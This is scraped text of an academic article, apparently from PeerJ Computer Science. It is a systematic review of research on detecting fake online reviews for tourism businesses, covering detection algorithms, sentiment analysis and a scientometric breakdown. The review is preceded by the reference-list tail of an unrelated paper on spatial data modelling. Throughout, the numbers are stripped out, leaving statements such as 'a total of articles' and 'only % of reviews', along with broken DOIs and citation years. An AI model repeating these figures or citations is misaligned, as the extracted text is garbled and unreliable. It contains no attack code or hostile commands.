m. . sgc: a dimension-independent model for pointsets with internal structures and incomplete boundaries. in: wosny m, turner j, preiss k, eds. proceedings of the ifip workshop on cad/cam. – . shreiner d, sellers g, kessenich j, licea-kane b, khronos arb working group. . opengl programming guide: the official guide to learning opengl, version . . th edition. addison-wesley. snyder jp. . map projections—a working manual. reston: us geological survey. arroyo ohori et al. ( ), peerj comput. sci., doi . /peerj-cs. / https://peerj.com http://dx.doi.org/ . / - ( ) - http://dx.doi.org/ . / . http://arxiv.org/abs/ . http://dx.doi.org/ . / http://dx.doi.org/ . /j. - . .tb .x http://dx.doi.org/ . / http://dx.doi.org/ . /a: http://dx.doi.org/ . /peerj-cs. sohanpanah c. . extension of a boundary representation technique for the description of n dimensional polytopes. computers & graphics ( ): – doi . / - ( ) - . steeb w-h. . the nonlinear workbook. th edition. singapore: world scientific publishing. van oosterom p. . reactive data structures for geographic information systems. phd thesis, leiden university. van oosterom p. . variable-scale topological data structures suitable for progressive data transfer: the gap-face tree and gap-edge forest. cartography and geographic information science ( ): – doi . / . van oosterom p, meijers m. . vario-scale data structures supporting smooth zoom and progressive transfer of d and d data. international journal of geographical information science : – doi . / . . . van oosterom p, stoter j. . d data modelling: full integration of d/ d space, time and scale dimensions. in: fabrikant si, reichenbacher t, van kreveld m, schlieder c, eds. geographic information science: th international conference, giscience , zurich, switzerland, september – , . proceedings. berlin, heidelberg: springer, – . wachowicz m, healy rg. . towards temporality in gis. in: innovations in gis. milton park: taylor & francis, – . worboys m. . a model for spatio-temporal information. in: proceedings of the th international symposium on spatial data handling. – . worboys mf. . a unified model for spatial and temporal information. the com- puter journal ( ): – doi . /comjnl/ . . . worboys mf, hearnshaw hm, maguire dj. . object-oriented data modelling for spatial databases. international journal of geographical information systems ( ): – doi . / . yau m-m, srihari sn. . a hierarchical data structure for multidimensional digital images. communications of the acm ( ): – doi . / . . arroyo ohori et al. ( ), peerj comput. sci., doi . /peerj-cs. / https://peerj.com http://dx.doi.org/ . / - ( ) - http://dx.doi.org/ . / http://dx.doi.org/ . / . . http://dx.doi.org/ . /comjnl/ . . http://dx.doi.org/ . / http://dx.doi.org/ . / . http://dx.doi.org/ . /peerj-cs. submitted april accepted august published september corresponding author jose ramon saura, joseramon.saura@urjc.es academic editor susan herring additional information and declarations can be found on page doi . /peerj-cs. copyright reyes-menendez et al. distributed under creative commons cc-by . open access the importance of behavioral data to identify online fake reviews for tourism businesses: a systematic review ana reyes-menendez , jose ramon saura and ferrão filipe department of business economics, rey juan carlos university, madrid, spain vice-rector universidade portucalense, universidade portucalense infante d. henrique, porto, portugal abstract in the last several decades, electronic word of mouth (ewom) has been widely used by consumers on different digital platforms to gather feedback about products and services from previous customer behavior. however, this useful information is getting blurred by fake reviews—i.e., reviews that were created artificially and are thus not representative of real customer opinions. the present study aims to thoroughly investigate the phenomenon of fake online reviews in the tourism sector on social networking and online reviews sites. to this end, we conducted a systematic review of the literature on fake reviews for tourism businesses. our focus was on previous studies that addressed the following two main topics: (i) tourism (ii) fake reviews. scientific databases were used to collect relevant literature. the search terms ‘‘tourism’’ and ‘‘fake reviews’’ were applied. the database of web of science produced a total of articles and, after the application of different filters following the prisma flow diagram, the process resulted in the selection of studies. our results demonstrate that (i) the analysis of fake reviews is interdisciplinary, ranging from computer science to business and management, (ii) the methods are based on algorithms and sentiment analysis, while other methodologies are rarely used; and (iii) the current and future state of fraudulent detection is based on emotional approaches, semantic analysis and new technologies such as blockchain. this study also provides helpful strategies to counteract the ubiquity of fake reviews for tourism businesses. subjects human–computer interaction, computer networks and communications, network science and online social networks keywords online reviews, fake reviews, consumer behavior, algorithms, tourism introduction in the last four decades, the continuously growing sector of tourism has been supported by the development of information and communication technologies (ict) (papathanassis & buhalis, ; buhalis & law, ). in the st century, the digital revolution in social sciences and tourism should be taken into account, as it is one of the important factors that make the tourism industry competitive (moutinho, ballantyne & rate, ; saura & bennett, ). nowadays, consumers use different social platforms, such as social networking sites (sns), consumer review sites, blogs, and social communities in order to communicate how to cite this article reyes-menendez a, saura jr, filipe f. . the importance of behavioral data to identify online fake reviews for tourism businesses: a systematic review. peerj comput. sci. :e http://doi.org/ . /peerj-cs. mailto:joseramon.saura@urjc.es https://peerj.com/academic-boards/editors/ https://peerj.com/academic-boards/editors/ http://dx.doi.org/ . /peerj-cs. http://creativecommons.org/licenses/by/ . / http://creativecommons.org/licenses/by/ . / http://doi.org/ . /peerj-cs. and share their purchase experiences and behavior regarding for products and brands with other consumers (cheung & thadani, ; chew, metheney & teague, ; hubert et al., ). the continuously developing technologies and the wide spread use of the internet in several industries have empowered the evolution from traditional word-of-mouth to electronic word-of-mouth (ewom) (gottschalk & mafael, ; manes & tchetchik, ). ewom is embodied in online reviews that customers write for other customers. the content of online reviews depends on the experience that these specific customers have with purchased products or services (munar & jacobsen, ; saura, reyes-menendez & alvarez-alonso, a). this fact has an important consequence for businesses, as there is a power shift from companies to consumers (hennig-thurau, walsh & walsh, ; reyes-menendez et al., ). the abovementioned power shift is particularly important in certain industries, such as the tourism industry where customers pay close attention to the opinion of previous travelers (papathanassis & knolle, ). for that reason, online reviews are a powerful communication tool for tourism businesses. tourism businesses are companies such as hotels, ancillary services, transportation companies and restaurants (riegner, ; reyes-menendez, saura & palos-sánchez, b). with the growth of the internet, the number of online reviews has increased as well, exerting a significant influence on customers’ purchase decision making (bennett, yábar & saura, ). the growing relevance of this type of communication is particularly important on social platforms where it takes the form of online reviews. however, what happens when this information does not represent the objective reality? are companies, rather than real consumers, writing these reviews? in , the federal trade commission (ftc) denounced, for the first time, a company that advertised products to lose weight on amazon for writing false reviews on this platform. in a press interview, the director of ftc, andrew smith, said that false reviews adversely affect both consumers and companies, as they represent a breach of market norms. for their part, amazon representatives declared that they would take legal action against those fake reviews and invest significant economic and human resources to ensure that the reviews of the products presented on their platform are true and up-to-date (shu, ). overall, consumers are becoming increasingly aware that many of the reviews on social network sites are fraudulent. to show this trend in numbers, following Önder & ulrich gunter ( ) we first made a search with google trends, a tool used previously (Önder, irem & ulrich gunter, ) to identify past search trends in google on various topics of interest. the results are shown in figs. and . in fig. , the searches on ‘‘fake reviews’’ made by users on google are shown with a solid line, while searches on ‘‘fake news’’ are shown with a dotted line. as can be seen in fig. , the number of searches on both topics has increased from to . however, the increase is dramatically more pronounced for the searches related to ‘‘fake news’’. the dynamics of the growth in the number of searches on ‘‘fake reviews’’ only is shown in fig. . as can be seen in fig. , the number of searches on ‘‘fake reviews’’ has steadily increased throughout the period – , and this number continues to grow. reyes-menendez et al. ( ), peerj comput. sci., doi . /peerj-cs. / https://peerj.com http://dx.doi.org/ . /peerj-cs. figure evolution of searches about fake news and fake reviews. source: google trends ( ). full-size doi: . /peerjcs. /fig- figure evolution of searches about fake reviews. source: google trends ( ). full-size doi: . /peerjcs. /fig- in the next step, we checked the importance of the topic of fake reviews for the scientific community. this was done with a search in web of science (wos), a scientific database that indexes scientific articles. similarly to the results obtained with google trends, the wos findings suggest that, throughout – , there has been a considerable growth in the number of articles published on the issues of fake news and fake online reviews. furthermore, again consistent with the results of using google trends, the scientific community has been more interested in the topic of fake news, as we found papers that include the term ‘‘fake news’’ in the title, while there were only papers with the term ‘‘fake reviews’’ in the title. figure shows the dynamics in the number of citations to articles addressing fake online reviews throughout the period – . as can be seen in fig. , the first citations appeared in . however, it was not until that scientific interest in fake online reviews skyrocketed, and it continues to grow today. of note, according to the publication terms of the journals included in the jcr (journal citation report) index to which web of science (wos) belongs, the publications that appeared in will begin to get cited in the next months or years. this explains why the publications from do not follow the growth trend as compared to the previous years. reyes-menendez et al. ( ), peerj comput. sci., doi . /peerj-cs. / https://peerj.com https://doi.org/ . /peerjcs. /fig- https://doi.org/ . /peerjcs. /fig- http://dx.doi.org/ . /peerj-cs. figure number of citations to articles by year. source: google trends ( ). full-size doi: . /peerjcs. /fig- the results shown in figs. – underscore the importance of the topic of fake online reviews for consumers, companies, and the scientific community. accordingly, in the present paper, our major goal is to identify directions of current research to address the problem of fake reviews on tourism platforms. the remainder of this paper is structured as follows. after a brief literature review in ‘literature review’, we present the methodology used in the present study in ‘methodology’. results are reported in ‘exploratory analysis of results’. the paper concludes with a discussion of implications of our findings (‘implications’) and general conclusions (‘conclusions’). literature review over the last years, many studies have investigated the impact of online reviews on consumer purchase behavior and decision making (chevalier & mayzlin, ; riegner, ; gretzel & yoo, ). a strong influence of online reviews has also been highlighted in numerous industrial statistic reports (e.g., reyes-menendez et al., ). electronic word-of-mouth has become an important concept for tourism businesses (papathanassis & knolle, ). according to litvin, goldsmith & pan ( ) and pai et al. ( ), ewom is the most important source of information that drives consumer purchase behavior in the hospitality and tourism services sectors. in the last several decades, advances in information and communication technologies (icts) have transformed both travelers’ behavior and the tourism industry (buhalis & law, ). nowadays, reyes-menendez et al. ( ), peerj comput. sci., doi . /peerj-cs. / https://peerj.com https://doi.org/ . /peerjcs. /fig- http://dx.doi.org/ . /peerj-cs. the number of travelers who access the internet to book hotel rooms via third-party intermediaries is continuously increasing (luo, chen & zheng, ). furthermore, several studies demonstrated that about two-thirds of customers prefer to read online consumer reviews about a hotel, rather rely on the hotel’s own descriptions. such online reviews are visited by hundreds of millions of potential hotel visitors every year (reyes-menendez, saura & martinez-navalon, ) therefore, in order to obtain a better understanding of the continuously increasing impact of ewom on different social platforms and its effect on the decision making and behavior of hotel consumers, reviews on online travel sites and social networking sites should be taken into account (saura, rodriguez herráez & reyes-menendez, ). yet, a recently emerging issue with online reviews is that some online reviews are fake. although most online platforms have their own false review detection algorithms (cheng, tseng & chung, ), these algorithms are sometimes limited in scope and filter only % of published fake reviews (luca & zervas, ). therefore, there is a clear need to improve the existing algorithms and elaborate new approaches. many studies have sought to do just that (e.g., elmurngi & gherbi, ; munzel, ; zhang et al., ). to this end, various methodologies have been used, some of which will be discussed in the remainder of this paper. methodology following kazakov & predvoditeleva ( ), in the present study, we aimed to provide an overview of previous research on the state of art of online fake reviews in tourism social networking sites. we focused on the analysis of users’ ability to detect real or fake reviews. to this end, we critically examined the available literature on tourism fake reviews and behavioral approaches to analyze and identify them for tourism businesses. the systematic literature review focused on the following two main topics: (i) fake reviews; (ii) tourism. following sherman et al. ( ) and banerjee, chua & kim ( ), we used a randomized controlled process to select the main topics and consequent search terms ‘‘fake reviews’’ and ‘‘tourism’’. the scientific databases of scopus, pubmed, psyinfo, sciencedirect, and web of science were used to collect relevant studies on the issue at stake. of note, when performing the search by ‘‘title’’ in the scientific database web of science, only one article met the aforementioned search requirement, that both ‘‘fake reviews and tourism’’ were contained in the title. therefore, following saura, palos-sánchez & suárez ( ), we included the articles that were initially obtained as a result of the search, prioritizing those that dealt with reviews, even if they were not specifically focused on tourism platforms. we reasoned that the insights reported in these studies could be extended to address the problem of false reviews on tourism platforms. the search yielded a total of articles; after different filters were applied (see fig. ), a total of studies were selected for further analysis. the boolean operator and was applied to optimize the results. all articles were analyzed by reading the titles and abstracts and selecting the ones which met the inclusion criteria. next, we analyzed the selected papers. the data were collected in june using amstar ( ), a tool reyes-menendez et al. ( ), peerj comput. sci., doi . /peerj-cs. / https://peerj.com http://dx.doi.org/ . /peerj-cs. figure prisma flow diagram. full-size doi: . /peerjcs. /fig- initially designed to assess the quality of articles based on their abstracts (shea et al., ). in this way, we ensured that only high-quality studies were included in the dataset. in the process of article selection, we also followed the recommendations formulated by van den bosch & ode sang ( ). these recommendations include keyword search in several databases, predefined inclusion criteria, and data extraction based on selected keywords. to this end, following saura, palos-sánchez & suárez ( ), we used the preferred reporting items for systematic reviews and meta-analyses (prisma) flow diagram. this method, introduced by moher et al. ( ), provides guidelines to develop systematic reviews and meta-analyses that include conceptual and practical advances in the science of systematic reviews. one of the phases of the prisma flow diagram is discarding the articles that have inadequate or inconclusive terms. the terms considered as inadequate or inconclusive are those that a priori may correspond to the keywords; however, when reading the article in depth, it is observed that they are not within the scope of the investigation. these terms can be misleading, as in the case of reviews that may be either tourist reviews or peer reviews. our aim was to achieve the highest possible amount of evidence in the results based on high-quality studies. some of the variables used in amstar to evaluate the quality of the systematic review were (i) the relationship of the research question to the criteria included in the study; (ii) the extraction of data from at least two independent researchers; (iii) the quality of the literature review, (iii) identification and definition of concepts; and (iv) the quality of the conclusions stated in the study. reyes-menendez et al. ( ), peerj comput. sci., doi . /peerj-cs. / https://peerj.com https://doi.org/ . /peerjcs. /fig- http://dx.doi.org/ . /peerj-cs. exploratory analysis of results the systematic literature review (rsl) was proposed by saura, palos-sánchez & suárez ( ) and bassett ( ) as a development tool to carry out an exploratory analysis of previously reported results. such a literature review is used to evaluate researchers’ interest in a specific topic (saura, reyes-menendez & palos-sanchez, b). a literature review is an exploratory methodology and consists of collecting and re-analyzing available findings. a literature review usually includes both primary and secondary sources. luo & zhong ( ) and comerio & strozzi ( ) conducted literature reviews and applied exploratory analysis specifically for tourism businesses, while huete-alcocer ( ) focused on the transformation of the traditional word-of-mouth into electronic word-of- mouth, and the behavioral implications of this transition for the tourism industry. a summary of the studies selected for further analysis in the present review is shown in table . table presents the authors of relevant studies, as well as the main contents of those studies. based on this information, we categorized the reviewed studies in several groups. for instance, the studies that can be applied to all sectors were categorized as ‘‘all industries’’. a study classified into the category of ‘‘e-commerce’’ was included in the analysis since, for example, tripadvisor is considered an e-commerce platform in the tourism sector. studies on restaurants were categorized into the ‘‘restaurant—hospitality industry’’ group. finally, articles on hotels and other tourist services were grouped into the ‘‘tourism’’ category. the studies summarized in table demonstrate the growing interest in the concept of fake reviews and social networking sites, particularly in the hospitality and tourism industries. some of these studies (e.g., banerjee & chua, ; banerjee et al., ; cardoso, silva & almeida, ; chang et al., ; deng & chen, ; hunt, ; lappas, sabnis & valkanas, a; lappas, sabnis & valkanas, b; li, feng & zhang, ; munzel, ) focus on the tourism industry category, while others fall into the hospitality industry category (chen, guo & deng, ; li et al., ; li et al., ; luca & zervas, ). some works (lin et al., ; zhang et al., ; ramalingam & chinnaiah, ) were included as part of the analysis because their results can be implemented in every industry that allows consumers to write reviews, including the tourism industry. elmurngi & gherbi ( ) analyzed false reviews in e-commerce, considering that tripadvisor is the most important e-commerce platform in the hospitality industry; therefore, this study might be of interest to the present study (reyes-menendez, saura & alvarez-alonso, a). the interest in the concept of fake reviews is underpinned by two factors. first, as demonstrated in several studies, the currently available algorithms of false review detection remain largely ineffective. for instance, luca & zervas’ ( ) results demonstrate that only % of the false reviews are filtered on the yelp platform—particularly, those that have more extreme content, either positive or negative; this suggests that the remaining % of reviews are not filtered and may be false. second, as demonstrated in several studies, false reviews negatively impact companies’ visibility. for instance, lappas, sabnis & valkanas ( a) and lappas, sabnis & valkanas ( b) report that, with only false reviews in some markets, competitors can be overtaken in terms of visibility. in this sense, reyes-menendez et al. ( ), peerj comput. sci., doi . /peerj-cs. / https://peerj.com http://dx.doi.org/ . /peerj-cs. table previous studies on fake online reviews in the tourism industry. authors study description study industry banerjee & chua ( ) this study proposes several algorithms of identification of false reviews. attention is paid to linguistic aspects of comprehension, level of detail, writing form, and cognitive indicators tourism banerjee et al. ( ) this study investigates false reviews published on tripadvisor. after completing a survey, users are invited to write fake hotel reviews tourism cardoso, silva & almeida ( ) this paper is an exhaustive review of the content analysis methods of false review detection. to this end, the authors develop experiments based on hotels tourism chang et al. ( ) in this study, a rumor model is used to detect false reviews on the tripadvisor platform based on the following three characteristics of the content: important attribute words, quantifiers, and the ratio of names and verbs. the proposed model reduces the possibility of obtaining false reviews tourism deng & chen ( ) this study focuses on the development of an algorithm, based on sentiment analysis, to identify false reviews of restaurants. the results demonstrate that the proposed algorithm has the predictive capacity of over % tourism hunt ( ) this study focuses on the legal aspect of fake reviews and argues for the adoption of specific laws to prohibit the publication of false reviews tourism lappas, sabnis & valkanas ( a) and lappas, sabnis & valkanas ( b) the analysis is based on over . million comments from , hotels in cities to understand the impact of false reviews on the visibility of establishments. the results suggest that, with only false reviews in some markets, competitors can be overtaken in terms of visibility tourism li, feng & zhang ( ) based on the density of the reviews, as well as their semantic aspects and emotional aspects, this study creates an algorithm for false review detection based on review content applicable to the tourism industry tourism munzel ( ) this study analyzes published reviews and rejected reviews taking into account the information about the author, age, and stars the user has been given in recently published reviews. the results emphasize the importance of the previous history of users who publish reviews for false review detection tourism chen, guo & deng ( ) this study proposes an algorithm based on sentiment analysis to identify false reviews in restaurants. the results demonstrate that the proposed algorithm has the predictive capacity of % restaurants - hospitality industry li et al. ( ) this study focuses on the dianping, china’s largest restaurant review platform, and analyzes the dependencies among reviews, users, and ip addresses using an algorithm called multi-typed heterogeneous collective classification (mhcc), and then extends it to collective positive and unlabeled learning (cpu) restaurants - hospitality industry (continued on next page) reyes-menendez et al. ( ), peerj comput. sci., doi . /peerj-cs. / https://peerj.com http://dx.doi.org/ . /peerj-cs. table (continued) authors study description study industry li et al. ( ) in this study, the louvain community detection method is used to study online communities. the results suggest that false reviews predominate in profiles with low scores, and that the more followers a community has, the greater the number of false reviews restaurants - hospitality industry luca & zervas ( ) this study analyzes the reviews published on the yelp site. the results demonstrate that only % of the reviews are filtered (those that more extreme, either positively or negatively). the restaurants that usually publish false reviews are those with fewer comments or negative comments. restaurant chains usually publish fewer false reviews. finally, more competitive restaurants are more likely to get false reviews restaurants - hospitality industry elmurngi & gherbi ( ) in this study, textual classification and sentiment analysis are used to identify false reviews in e-commerce. four rating sentiment classification algorithms are compared: naïve bayes (nb), support vector machine (svm), k-nearest neighbors (knn-ibk), and decision tree (dt-j ). the results show that algorithms can effectively predict false reviews e-commerce lin et al. ( ) this study proposes a new approach to identifying false reviews that is based on the content of the reviews and the behavior of the users. the results show that the proposed approach is more precise and accurate than current algorithms all industries ramalingam & chinnaiah ( ) this study reviews the latest algorithms of false profile detection in social networks all industries zhang et al. ( ) this study analyzes non-verbal characteristics of users who write false reviews to create a predictive algorithm of detection of false reviews. the algorithm can complement the traditional method of detection of false reviews all industries hunt ( ) focuses on the example of the uk advertising standards authority that found against the tourism social platform tripadvisor. these figures explain the concern of establishments in the tourism sector about the phenomenon of false reviews. in what follows, we review the methodologies used in previous research on false reviews in the tourism industry. particular attention is paid to the unit of analysis focused on in previous studies and the behavioral approach to the analysis and identification of online fake reviews in tourism. methodologies used in previous research first, most studies in the present systematic review of the literature focus on analysis of the algorithms of false review detection and their improvement. in these studies, large amounts of data from social communities such as tripadvisor or yelp are typically used (chang et al., ; li et al., ). the second most used methodology is sentiment analysis, focusing on the emotional aspects and feelings expressed in written reviews. in this methodology, comments are classified as positive, negative or neutral according to the words contained in them (chen, guo & deng, ; deng & chen, ; elmurngi & gherbi, ). the reyes-menendez et al. ( ), peerj comput. sci., doi . /peerj-cs. / https://peerj.com http://dx.doi.org/ . /peerj-cs. table classification of previous studies according to their methodology. authors algorithms sentiment analysis other methodologies banerjee & chua ( ) √ banerjee et al. ( ) √ cardoso, silva & almeida ( ) √ chang et al. ( ) √ li et al. ( ) √ li, feng & zhang ( ) √ li et al. ( ) √ luca & zervas ( ) √ lappas, sabnis & valkanas ( a) and lappas, sabnis & valkanas ( b) √ chen, guo & deng ( ) √ deng & chen ( ) √ elmurngi & gherbi ( ) √ lin et al. ( ) √ zhang et al. ( ) √ hunt ( ) √ munzel ( ) √ ramalingam & chinnaiah ( ) √ third direction of research comprises other methodologies that aim to either discover new knowledge to be implemented in false review detection for tourism businesses (hunt, ) or perform the analysis of legal aspects and measures that countries like the united kingdom or australia take to counteract false reviews (ramalingam & chinnaiah, ). table provides a classification of the studies reviewed in the present study into the aforementioned three groups. unit of analysis the studies reviewed in this paper approach the phenomenon of false reviews differently. for some studies (li et al., ; lin et al., ; ramalingam & chinnaiah, ) the major units of analysis are profiles of users who write reviews. these studies seek patterns that would help better identify profiles that are more likely to generate false reviews. for other studies, the major unit of analysis is the content of online reviews. here, the studies tend to focus on two types of content. on the one hand, some studies focus on the textual content of reviews, i.e., on their linguistic aspects, such as the ratio of nouns to verbs, the type of words or the attributes used to write false reviews (banerjee et al., ; cardoso, silva & almeida, ; chang et al., ; chen, guo & deng, ; deng & chen, ; elmurngi & gherbi, ; lappas, sabnis & valkanas, a; lappas, sabnis & valkanas, b). on the other hand, there are studies that prioritize detecting behavioral and emotional characteristics of users who write false reviews (banerjee & chua, ; li, feng & zhang, ; li et al., ; luca & zervas, ; zhang et al., ). munzel ( ) focuses the research on both the textual and the behavioral aspects. at the same time, hunt ( ) does a review of the legal aspects that concern fake reviews, such that the unit of reyes-menendez et al. ( ), peerj comput. sci., doi . /peerj-cs. / https://peerj.com http://dx.doi.org/ . /peerj-cs. table classification of previous studies according to their unit of analysis. authors user profile content textual behavioral li et al. ( ) √ – – lin et al. ( ) √ – – ramalingam & chinnaiah ( ) √ – – banerjee et al. ( ) – √ – cardoso, silva & almeida ( ) – √ – chang et al. ( ) – √ – chen, guo & deng ( ) – √ – deng & chen ( ) – √ – elmurngi & gherbi ( ) – √ – lappas, sabnis & valkanas ( a) and lappas, sabnis & valkanas ( b) – √ – munzel ( ) – √ √ banerjee & chua ( ) – – √ li, feng & zhang ( ) – – √ li et al. ( ) – – √ luca & zervas ( ) – – √ zhang et al. ( ) – – √ hunt ( ) – – – analysis is neither user profile nor content. in table , the reviewed studies are classified into the aforementioned three groups. scientometric analysis in the next step, in order to gain a better understanding of which areas of research focused more on false reviews, scientometric analysis was performed. here, we followed a previous study by saura, palos-sánchez & suárez ( ). a scientometric analysis is the quantitative and qualitative analysis of science and scientific outcomes. this concept was first created by price ( ) and has been widely used as a complementary analysis of systematic literature reviews (saura, palos-sánchez & suárez, ) or as the major topic of the study (kullenberg & kasperowski, ). in their work, kollwitz & papathanassis ( ) highlighted the importance of using qualitative methods, such as delphi techniques for the tourism industry, and walle ( ) supported using a combination of qualitative with quantitative analysis in the tourism sector. in table , the results of both qualitative and quantitative analysis are summarized with respect to the author, journal indexed in jcr ranking and its category and quartile. the author field is included to trace the analysis conducted by the authors throughout the article. the quartile and category reflect all the categories that the journal has according to its web of science classification and, in case the quartile was different for different categories, that is also reflected in the table. the discipline with the highest number of publications was computer science as can be seen in table . there are a total of publications that belong to the category reyes-menendez et al. ( ), peerj comput. sci., doi . /peerj-cs. / https://peerj.com http://dx.doi.org/ . /peerj-cs. table scientometric classification. author journal quartile category banerjee & chua ( ) th international conference on digital information management (icdim) – computer science, information systems; computer science, theory & methods; engineering, electrical & electronic banerjee et al. ( ) th international conference on ubiquitous information management and communication (acm imcom) – computer science, theory & methods cardoso, silva & almeida ( ) neurocomputing q computer science; artificial intelligence chang et al. ( ) lecture notes in computer science q computer science, theory & methods chen, guo & deng ( ) lecture notes in computer science q computer science deng & chen ( ) lecture notes in computer science q computer science, theory & methods elmurngi & gherbi ( ) th international conference on innovative computing technology (intech) – computer science, hardware & architecture; computer science, software engineering; computer science, theory & methods hunt ( ) computer law and security review q law lappas, sabnis & valkanas ( a) and lappas, sabnis & valkanas ( b) information systems research q management information science & library science li, feng & zhang ( ) rd international conference on information science and control engineering (icisce) – automation & control systems, computer science, theory & methods li et al. ( ) ieee international conference on data mining (icdm) – computer science, artificial intelligence; computer science, information systems li et al. ( ) china communications q telecommunications lin et al. ( ) proceedings of the ieee/acm international conference on advances in social networks analysis and mining (asonam ) – computer science, information systems; computer science, theory & methods luca & zervas ( ) management science q management operations research & management science munzel ( ) journal of retailing and customer services q business ramalingam & chinnaiah ( ) computers and electronical engineering q computer science; engineering, electrical & electronic q computer science, interdisciplinary zhang et al. ( ) journal of management information systems q management computer science, information systems q information science & library science r eyes-m enendez etal. ( ),p eerj c om put. s ci.,d o i . /peerj-cs. / https://peerj.com http://dx.doi.org/ . /peerj-cs. of computer science and six that fall into the category of computer science theory & methods. the next category is information systems which has four publications. other disciplines include management (three publications), and operations research, management science, and business (one publication each). this indicates that fake reviews are of interest to both computer scientists who develop the algorithms of false review detection and the management of companies and businesses that is willing to improve the detection of fake reviews that undermine the credibility of these platforms. all reviewed studies come from the disciplines of artificial intelligence, automation & control systems, business, computer science, computer science theory & methods, engineering electrical & electronic, hardware & architecture, information systems, information science & library science, interdisciplinary, software engineering, law, management, operations research & management science and finally, telecommunications. all journals have only published one paper, except for the journal lecture notes in computer science that published three articles (chen, guo & deng, ; deng & chen, ; chang et al., ). it is also interesting to note that six of the papers that were listed in the database of the web of science and for which we could extract the category were published as conference proceedings; therefore, their quartile could not be analyzed. regarding the quartile of the remaining papers, we took the highest rated category in the case when there was more than one category with different quartiles. therefore, three of them were q , four were q , and three were q . implications implications for managers the results of the present study underscore the importance of online reviews for the tourism industry not only on major websites (papathanassis, ), but also on other type of platforms that require managerial attention for proper brand management (saura, palos-sanchez & reyes-menendez, ). nowadays, online review sites and social media websites have become an important source of information for consumers and exert a strong influence on consumer purchase behavior and decision making (gretzel et al., ; kim, kandampully & bilgihan, ; manes & tchetchik, ; reyes-menendez et al., ). therefore, efficient collection and analysis of fake online reviews can help companies to remain competitive in this industry (hennig-thurau, walsh & walsh, ; hu et al., ; lin et al., ; zhang et al., ). the ubiquitous presence of fake online reviews on review and social networking sites creates an asymmetry in the information that consumers get about a company. however, when managers track customer comments, the information asymmetry is reduced (manes & tchetchik, ). the growth in the number of fake reviews in the tourism industry and the influence of these references on customer behavior and decision making has driven numerous managers to explore the phenomenon of fake reviews and consider the application of new online content strategies (li, feng & zhang, ; li et al., ; ramalingam & chinnaiah, ; reyes-menendez et al., ). reyes-menendez et al. ( ), peerj comput. sci., doi . /peerj-cs. / https://peerj.com http://dx.doi.org/ . /peerj-cs. considering that fake reviews have the power to provide more visibility for companies and affect their behavior (lappas, sabnis & valkanas, a; lappas, sabnis & valkanas, b), it is necessary to reinforce the creation of online reviews from real customers, avoid the creation of fake reviews, and develop content strategies to support and promote customers who are willing to write true information for other customers online. implications for researchers despite the extensive scientific research on fake reviews that offers some solutions to counteract them, it is important to continue improving the algorithms of false review detection on social platforms in the tourism sector. to this end, researchers engaged in this field of study should have a thorough understanding of the available results. as demonstrated in the present review, different methods have been used in previous research on false reviews. these include the development of algorithms based on big data from the social platforms themselves (e.g., chang et al., ; li et al., ) as well as sentiment analysis of written comments (chen, guo & deng, ; deng & chen, ; elmurngi & gherbi, ). finally, there is a group of studies that used other methodological approaches (hunt, ; ramalingam & chinnaiah, ). researchers may apply our results to reinforce the theoretical frameworks of their scholarship by correctly choosing a methodological procedure for their research. it is also important to consider the units of analysis for future research studies in this area. we noted that while some studies focused on user profiles (li et al., ), most extant research focused on the content of reviews. in the latter group of studies, attention was paid either to the texts and their linguistic characteristics (e.g., banerjee et al., ; cardoso, silva & almeida, ; chang et al., ) or to the emotions and behavior of users that could be inferred from reviews (e.g., banerjee & chua, ; banerjee et al., ; li, feng & zhang, ; lin et al., ; zhang et al., ). conclusions this exploratory study has defined the scope and identified recent avenues of research on fake online reviews in the tourism industry. interestingly, even though consumers might be aware that some comments are fictitious, they still rely on them to make decisions (manes & tchetchik, ). however, although many studies have investigated the impact of ewom in the tourism industry (mauri & minazzi, ; vermeulen & seegers, ; xie et al., ), further research on the impact of new approaches is necessary to detect fake online reviews for tourism businesses. as suggested by our literature review, to counteract this trend, tourism companies must constantly improve their methods of detecting false reviews. these methods are mainly based on algorithms (banerjee & chua, ; banerjee et al., ), and the improvements are especially based on behavioral approaches (li, feng & zhang, ; zhang et al., ). in addition, in order not to lose their visitors’ trust (ladhari & michaud, ), platforms that allow users to write reviews about their experiences with tourism companies take legal reyes-menendez et al. ( ), peerj comput. sci., doi . /peerj-cs. / https://peerj.com http://dx.doi.org/ . /peerj-cs. action against false reviews (hunt, ). when a company spots fake reviews, it has the right to take action. tripadvisor has fought fraudulent reviews in thousands of lawsuits. the systematic review of the literature undertaken in the present study allows us to make the following three conclusions. first, our results demonstrate that there is an ever-growing interest, among scientific and consumer communities alike, in the credibility of online reviews in the tourism sector with an interdisciplinary approach. not only have computer science and information systems (e.g., chen, guo & deng, ; chang et al., ; li et al., ; zhang et al., ) published research about fake reviews but also management, business and operation research and management science (e.g., (lappas, sabnis & valkanas, a; lappas, sabnis & valkanas, b; luca & zervas, ); (munzel, ). consumer concern about fake reviews is particularly pronounced (see figs. and ). second, the results of both scientometric analysis and our literature review suggest that the methods of computer science are most frequently used in terms of the development and improvement of the methods to detect false reviews. most publications included in the literature review ( ) fall into the category of algorithms (eight) and sentiment analysis (six), while only a few of them (three) use other methods. third, our systematic review of the literature highlights the importance of further development of new methods for identifying false reviews based on the following criteria: ( ) those based on emotional approaches; ( ) those based on semantic analysis; and ( ) those based on new technologies. some of these methods are based on a behavioral and emotional analysis of the text of reviews in the tourism sector (banerjee & chua, ; li et al., ; luca & zervas, ; munzel, ; zhang et al., ). to this end, sentiment analysis and textual analysis were used (chen, guo & deng, ; deng & chen, ; elmurngi & gherbi, ; lappas, sabnis & valkanas, a; lappas, sabnis & valkanas, b; lin et al., ; zhang et al., ). other methods are focused on the semantic analysis of the reviews (li, feng & zhang, ; luca & zervas, ) and provide guidelines to follow in order to detect fraudulent reviews. some of these clues are based on extreme comments and ratings, as well as on comments lacking detail or reviews where first-person pronouns (e.g., i, me) are widely used to simulate sincerity. finally, some methods to improve the detection of fake reviews are mostly supported by new technologies (li et al., ) and present novel solutions for fake review detection. one of these technologies is the blockchain, which requires proof of payment in order to publish a review. the limitations of this study relate to the number of studies reviewed and the databases consulted. although the authors consulted the main scientific databases—scopus, pubmed, psyinfo, sciencedirect and web of science—there are more databases available for consultation. while our review of the literature has highlighted several important issues related to fake reviews in the tourism sector, further research that would perform in-depth analysis of specific aspects presented in this paper is needed. among such possibilities is using reyes-menendez et al. ( ), peerj comput. sci., doi . /peerj-cs. / https://peerj.com http://dx.doi.org/ . /peerj-cs. quantitative techniques to measure the impact of fake reviews on social networking sites. another promising area of future research is studying the behavioral aspects of users who write online reviews for tourism businesses. additional information and declarations funding the authors received no funding for this work. competing interests the authors declare 